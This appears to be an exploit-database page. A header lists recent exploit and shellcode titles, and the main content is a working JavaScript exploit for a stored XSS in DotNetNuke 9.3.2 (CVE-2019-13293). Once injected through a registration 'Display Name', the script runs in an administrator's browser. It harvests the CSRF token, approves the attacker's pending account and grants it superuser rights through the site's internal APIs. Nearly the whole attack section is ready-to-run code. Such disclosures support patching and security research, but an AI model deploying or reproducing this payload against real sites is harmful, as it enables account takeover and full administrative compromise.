
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
204 lines
No EOL
6.6 KiB
Text
204 lines
No EOL
6.6 KiB
Text
/*
|
|
Exploit Title: "Display Name" Stored Unauthenticated XSS in DNN v9.3.2
|
|
Date: 4th of July, 2019
|
|
Exploit Author: Semen Alexandrovich Lyhin
|
|
Vendor Homepage: https://www.dnnsoftware.com/
|
|
Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases
|
|
Version: v9.3.2
|
|
CVE : CVE-2019-13293
|
|
|
|
A malicious unauthenticated person can attempt to register a user with the XSS payload in "Display Name" parameter.
|
|
The administrator of the website will see a notification that a new user needs to be approved.
|
|
An administrator should click on this notification, and the JavaScript code will be executed in the administrator's browser.
|
|
|
|
This exploit adds the user, and grants him administrator priviliges.
|
|
|
|
A native module "module creator" also allows remote code execution.
|
|
|
|
*/
|
|
|
|
|
|
|
|
function ApproveNotification(baseurl, id) {
|
|
return new Promise(function (resolve, reject) {
|
|
var url = baseurl + "/Activity-Feed/Messages/";
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.onreadystatechange = function () {
|
|
if (xhr.readyState == 4) {
|
|
var data;
|
|
if (!xhr.responseType === "text") {
|
|
data = xhr.responseText;
|
|
} else if (xhr.responseType === "document") {
|
|
data = xhr.responseXML;
|
|
} else {
|
|
data = xhr.response;
|
|
}
|
|
|
|
var parser = new DOMParser();
|
|
var resp = parser.parseFromString(data, "text/html");
|
|
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
|
|
|
|
var post_params = "NotificationId=" + id;
|
|
var x1 = new XMLHttpRequest();
|
|
|
|
x1.open("POST", baseurl + "/API/InternalServices/NewUserNotificationService/Authorize");
|
|
x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
|
|
x1.setRequestHeader('RequestVerificationToken', token);
|
|
x1.send(post_params);
|
|
resolve();
|
|
}
|
|
}
|
|
xhr.open('GET', url, true);
|
|
xhr.send(null);
|
|
});
|
|
}
|
|
|
|
function MakeSuperAdmin(baseurl, id) {
|
|
return new Promise(function (resolve, reject) {
|
|
var url = baseurl + "/Activity-Feed/Messages/";
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.onreadystatechange = function () {
|
|
if (xhr.readyState == 4) {
|
|
var data;
|
|
if (!xhr.responseType === "text") {
|
|
data = xhr.responseText;
|
|
} else if (xhr.responseType === "document") {
|
|
data = xhr.responseXML;
|
|
} else {
|
|
data = xhr.response;
|
|
}
|
|
|
|
var parser = new DOMParser();
|
|
var resp = parser.parseFromString(data, "text/html");
|
|
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
|
|
|
|
var post_params = "null"
|
|
var x1 = new XMLHttpRequest();
|
|
|
|
x1.open("POST", baseurl + "/API/PersonaBar/Users/UpdateSuperUserStatus?userId=" + id + "&setSuperUser=true");
|
|
x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
|
|
x1.setRequestHeader('RequestVerificationToken', token);
|
|
x1.send(post_params);
|
|
resolve();
|
|
}
|
|
}
|
|
xhr.open('GET', url, true);
|
|
xhr.send(null);
|
|
});
|
|
}
|
|
|
|
function GetNotification(baseurl, username, moduleid, tabid) {
|
|
return new Promise(function (resolve, reject) {
|
|
var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/"
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.onreadystatechange = function () {
|
|
if (xhr.readyState == 4) {
|
|
var data;
|
|
if (!xhr.responseType === "text") {
|
|
data = xhr.responseText;
|
|
} else if (xhr.responseType === "document") {
|
|
data = xhr.responseXML;
|
|
} else {
|
|
data = xhr.response;
|
|
}
|
|
|
|
var parser = new DOMParser();
|
|
var resp = parser.parseFromString(data, "text/html");
|
|
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
|
|
|
|
var x1 = new XMLHttpRequest();
|
|
|
|
x1.open("GET", baseurl + "/API/CoreMessaging/MessagingService/Notifications?afterNotificationId=-1&numberOfRecords=1000&_=1562677665517", true);
|
|
x1.setRequestHeader('ModuleId', moduleid);
|
|
x1.setRequestHeader('TabId', tabid);
|
|
x1.onreadystatechange = () => {
|
|
|
|
if (x1.readyState == 4) {
|
|
if (!x1.responseType === "text") {
|
|
data = x1.responseText;
|
|
} else if (x1.responseType === "document") {
|
|
data = x1.responseXML;
|
|
} else {
|
|
data = x1.response;
|
|
}
|
|
|
|
//console.log(JSON.parse(data));
|
|
data = JSON.parse(data);
|
|
|
|
for (var key in data['Notifications']){
|
|
if (data['Notifications'][key]['Body'].includes(username)) {
|
|
resolve((data['Notifications'][key]['NotificationId']));
|
|
};
|
|
}
|
|
reject();
|
|
}
|
|
}
|
|
x1.send(null);
|
|
}
|
|
}
|
|
xhr.open('GET', url, true);
|
|
xhr.send(null);
|
|
});
|
|
}
|
|
|
|
function GetUserId(baseurl, username, tabid) {
|
|
return new Promise(function (resolve, reject) {
|
|
var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/"
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.onreadystatechange = function () {
|
|
if (xhr.readyState == 4) {
|
|
var data;
|
|
if (!xhr.responseType === "text") {
|
|
data = xhr.responseText;
|
|
} else if (xhr.responseType === "document") {
|
|
data = xhr.responseXML;
|
|
} else {
|
|
data = xhr.response;
|
|
}
|
|
|
|
var parser = new DOMParser();
|
|
var resp = parser.parseFromString(data, "text/html");
|
|
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
|
|
|
|
var x1 = new XMLHttpRequest();
|
|
|
|
x1.open("GET", baseurl + "/API/PersonaBar/Users/GetUsers?searchText=" + username + "&filter=0&pageIndex=0&pageSize=10&sortColumn=&sortAscending=false", true);
|
|
x1.setRequestHeader('TabId', tabid);
|
|
x1.onreadystatechange = () => {
|
|
if (x1.readyState == 4) {
|
|
if (!x1.responseType === "text") {
|
|
data = x1.responseText;
|
|
} else if (x1.responseType === "document") {
|
|
data = x1.responseXML;
|
|
} else {
|
|
data = x1.response;
|
|
}
|
|
|
|
//console.log(data);
|
|
data = JSON.parse(data);
|
|
resolve((data['Results'][0]['userId']));
|
|
|
|
reject();
|
|
}
|
|
}
|
|
x1.send(null);
|
|
}
|
|
}
|
|
xhr.open('GET', url, true);
|
|
xhr.send(null);
|
|
});
|
|
}
|
|
|
|
|
|
async function main(){
|
|
var username = "nobody34567";
|
|
var baseurl = "http://192.168.18.10/dotnetnuke/";
|
|
var moduleid = "374";
|
|
var tabid = "27"; //It's default ID of the module and tab, that should be used to get notification id. We can also parse it from the webpage.
|
|
var NotificationId = await GetNotification(baseurl, username, moduleid, tabid);
|
|
await ApproveNotification(baseurl, NotificationId);
|
|
var UserID = await GetUserId(baseurl, username, tabid);
|
|
MakeSuperAdmin(baseurl, UserID);
|
|
}
|
|
|
|
main(); |